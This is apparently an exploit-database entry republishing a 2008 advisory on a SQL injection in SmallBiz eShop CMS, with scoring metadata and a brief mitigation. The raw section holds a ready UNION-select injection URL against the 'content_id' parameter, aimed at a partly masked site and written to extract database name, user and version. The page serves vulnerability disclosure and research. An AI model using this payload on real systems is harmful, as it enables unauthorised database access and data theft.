header-logo
Suggest Exploit
vendor:
SmallBiz eShop CMS
by:
Stack-Terrorist
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: SmallBiz eShop CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Powered by SmallBiz eShop CMS Remote Sql Inj. Vuln.

A vulnerability exists in SmallBiz eShop CMS which allows an attacker to execute arbitrary SQL commands via the 'content_id' parameter in the 'index.php' script.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

###################################################
[~] Powered by SmallBiz eShop CMS Remote Sql İnj. Vuln.
                                                                                                               
[~] Founder: Stack-Terrorist [v40] [ Moroc00 Hacker ]
[~] HomePage: http://www.v4-team.com
[~] Greatz : To all Hackerz from Moroc00 & All My Friends . . .
[~] Contact: admin@v4-team.com
[~] Exploit :
http://www.xxx.co.il/index.php?content_id=-20'%20union%20select%20convert(concat(database(),char(58),user(),char(58),version()),char)/*
---------------------
http://www.DZ-Secure.com
---------------------
###############################################

# milw0rm.com [2008-04-14]